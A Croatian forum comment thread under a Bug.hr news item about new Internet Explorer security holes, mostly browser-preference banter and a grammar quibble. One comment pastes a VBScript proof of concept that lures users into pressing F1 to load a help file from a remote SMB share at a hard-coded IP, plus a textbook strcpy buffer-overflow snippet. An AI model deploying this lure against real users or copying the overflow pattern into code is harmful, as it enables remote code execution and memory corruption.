Još propusta u Internet Exploreru

poruka: 28
|
čitano: 3.415
1
+/- sve poruke
ravni prikaz
starije poruke gore
Ovo je tema za komentiranje sadržaja Bug.hr portala. U nastavku se nalaze komentari na "Još propusta u Internet Exploreru".
15 godina
neaktivan

ništa novo, svaki dan se sve više propusta otkrije. zato se držim podalje od internet explorera

ajmo svi na erepublik ;) <3 BF BC 2
Moj PC  
1 0 hvala 0
15 godina
neaktivan

to namjerno objavljuju budući da žele više korisnika IE8. Siguran sam da i IE8 ima rupa i rupica kojih su svjesni.

:-)
Moj PC  
3 0 hvala 0
16 godina
neaktivan

Šta je ovo...otkrije se 60 propusta na dan? :P

0 0 hvala 0
16 godina
neaktivan
RE: Još propusta u Internet Exploreru
Ah,kolko propusta još neče naći...
17 godina

Krešimir Brebrić, autor clanka, je napisao:

Također se istiće kako zaštitni mehanizmi u Windows Visti i kasnijim operativnim sustavima znatno ograničavaju mogućnosti zloupotrebe propusta obzirom da i u slučaju uspješnog iskorištavanja napadač ima samo vrlo ograničene u sustavu.

ja stvarno ne znam imaju ili u Bugu lektora ili ne, ali kad sam ja ucio gramatiku, govorilo se "istiČe" a ne "istiĆe" :-? ne razumijem, zar je toliko tesko prekopirati tekst u Word i odvrtiti spell checker koji bi sigurno ovaj propust vidio i ispravio ga.

Moj PC  
1 1 hvala 0
15 godina
neaktivan
ibazulic kaže...

Krešimir Brebrić, autor clanka, je napisao:

Također se istiće kako zaštitni mehanizmi u Windows Visti i kasnijim operativnim sustavima znatno ograničavaju mogućnosti zloupotrebe propusta obzirom da i u slučaju uspješnog iskorištavanja napadač ima samo vrlo ograničene u sustavu.

ja stvarno ne znam imaju ili u Bugu lektora ili ne, ali kad sam ja ucio gramatiku, govorilo se "istiČe" a ne "istiĆe" :-? ne razumijem, zar je toliko tesko prekopirati tekst u Word i odvrtiti spell checker koji bi sigurno ovaj propust vidio i ispravio ga.

e stvarno si faca ...

:-)
17 godina
ibazulic kaže...

Ajde pokusaj pogoditi koliki je postotak posjetitelja koji su procitali taj clanak, primijetio tu pravopisnu pogresku :)

17 godina

Imam dobru ideju - "fear campain" :)

Neka "hakerska" grupa koja uz to i mrzi Internet Explorer bi trebala napraviti crva/trojanca koji ce ciljano napasti doticni browser, te prikazati poruku tipa:

"Your computer has been hacked because of a security hole in Internet Explorer. Switch to an alternative browser, b*tch!"

I to sve na plavom ekranu smrti - pa da se likovi useru xD

0 0 hvala 0
15 godina

Internet Explorer je rupetina kakve nema nigdje.

2 0 hvala 0
16 godina
neaktivan

imo je moj buraz pravo IE je rupa kakve nema.........hvala bogu mozzila je kak tak u redu

0 0 hvala 0
15 godina
Pored toliko odlicni browsera ljudi jos uvijek koriste IE..
16 godina
neaktivan
x18x05x kaže...
Pored toliko odlicni browsera ljudi jos uvijek koriste IE..

tako je, prijeđite svi na operu  Izlanuo se

16 godina

Internet Explorer je zapravo jedan ogorman propust, otkrivanje nekakvih mini propusta u njemu je kao otkrivanje tople vode.

Plod nepouzdanosti kontracepcije
16 godina
neaktivan
Šime kaže...

Imam dobru ideju - "fear campain" :)

Neka "hakerska" grupa koja uz to i mrzi Internet Explorer bi trebala napraviti crva/trojanca koji ce ciljano napasti doticni browser, te prikazati poruku tipa:

"Your computer has been hacked because of a security hole in Internet Explorer. Switch to an alternative browser, b*tch!"

I to sve na plavom ekranu smrti - pa da se likovi useru xD

kad jednog dana alternativa napokon uspije napravit pošten browser na kojem će sve radit možda i uzmem neš drugo kao primarni browser, do tad je ie moj prvi izbor :)

kod mene normalno radi.....
16 godina
protjeran
cekpi kaže...

kad jednog dana alternativa napokon uspije napravit pošten browser na kojem će sve radit možda i uzmem neš drugo kao primarni browser, do tad je ie moj prvi izbor :)

ovaj...jedine stranice koje ie prikazuje kako treba su stranice koje su optimizirane za ie...

http://www.erepublik.com/en/referrer/GrimyHR
15 godina
neaktivan

zato sam ja prešo na firefox, makar i on dost sve češće ima više rupa, al puno manje neg IE...

Dompa
16 godina
protjeran

Jel to možda ovaj kod:

<html>
<script type="text/vbscript">
big = "\\184.73.14.110\PUBLIC\test.hlp"

//For i=1 to 2500
//  big = big & "\..\"
//Next

MsgBox "please press F1 to save the world", ,"please save the world",
big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
</script>

</html>

Cool

void function(char *str) {char buffer[16];strcpy(buffer,str); } void main() {char large_string[256];int i; for( i = 0; i &amp;amp;lt; 255; i++) large_string[i] = 'A';function(large_string)
Moj PC  
0 0 hvala 0
15 godina
zoran123456 kaže...

to namjerno objavljuju budući da žele više korisnika IE8. Siguran sam da i IE8 ima rupa i rupica kojih su svjesni.

to sam i ja pomislio,znači istina je

isti dan otkaz i žuti
17 godina
Šime kaže...
ibazulic kaže...

Ajde pokusaj pogoditi koliki je postotak posjetitelja koji su procitali taj clanak, primijetio tu pravopisnu pogresku :)

vjerojatno se isti mjeri u promilima :-)

@zoran123456: ne znam odnosi li se ovo "faca" kao pozitivno ili negativno, ali mene u citanju clanaka stvarno smeta nepoznavanje *osnovne* gramatike. da pricamo o nekakvim znanstvenim clancima, clanak bi bio odbijen zbog takve pogreske. srecom pa novinarstvo nije cijenjeno zanimanje u HR, pa se svaka susa moze sa istim baviti.

16 godina
neaktivan
grimyHR kaže...
cekpi kaže...

ovaj...jedine stranice koje ie prikazuje kako treba su stranice koje su optimizirane za ie...

odnosno sve meni potrebne :)

16 godina
protjeran

velika vecina web designera gleda da im stranice budu optimizirane sa ie i mozillom.

zato je tako visoka upotreba ie i dobar dobar dio kolaca zagrizla je i mozilla

17 godina
sablja kaže...

velika vecina web designera gleda da im stranice budu optimizirane sa ie i mozillom.

zato je tako visoka upotreba ie i dobar dobar dio kolaca zagrizla je i mozilla

LOL

IE ima toliki udio jer je krajem 90ih vodio bitku sa Netscape Navigatorom s kojim je bio nekompatibilan, tj. stranice optimizirane za jedan, se nisu dobro prikazival u drugom. Posto je IE pobijedio, postao je jedini browser, i to sve do negdje 2003.

Dakle, 2000-2004, IE je drzio udio kakav danas drze Windowsi, preko 90%.

S vremenom su se poceli pojavljivati drugi browseri i udio IE od tada lagano pada...

15 godina
cekpi kaže...

Postoje puno bolji alternativni  browseri samo ti to ne vidiš.

16 godina
neaktivan
Asterix kaže...
cekpi kaže...

ukaži mi na njih

jedine zahtjeve koji imam je da

- je podržan sso

- može u potpunosti prikazat microsoft web servise

- može prikazat galeriju na tportalu :)

16 godina
cekpi kaže...
Asterix kaže...
cekpi kaže...

ukaži mi na njih

- je podržan sso

Mozilla Firefox, Google Chrome. Opera navodno ima nekih problema sa tportalom, ali ništa što se ne može srediti.

16 godina
neaktivan
nontryer kaže...
cekpi kaže...
Asterix kaže...
cekpi kaže...

ukaži mi na njih

- je podržan sso

Mozilla Firefox, Google Chrome. Opera navodno ima nekih problema sa tportalom, ali ništa što se ne može srediti.

jesi uopce procital kaj se trazi?

16 godina

Addon za SSO:

https://addons.mozilla.org/en-US/firefox/addon/10717

SSO mi ne treba, ali u komentarima piše da addon radi odlično.

Ako neke stranice i nisu optimizirane za mozillu, postoji addon koji omogućava firefoxu da koristi IE-ov engine za otvaranje stranica ako zatreba

https://addons.mozilla.org/en-US/firefox/addon/1419

Vjerojatno slični dodaci postoje i za Chrome, jer od zadnje verzije dopušta instalaciju dodataka, ali ne bih znao koji jer ga ne koristim.

Poruka je uređivana zadnji put uto 16.3.2010 4:08 (nontryer).
15 godina
neaktivan
tako je! koristio sam firefox al kad se pojavio chrome nisam mogao odoljeti i od tad ga koristim... brz je, stabilan, ne zauzima puno memorije, lijepog sučelja...
www.val.hr
1
Nova poruka
E-mail:
Lozinka:

vrh stranice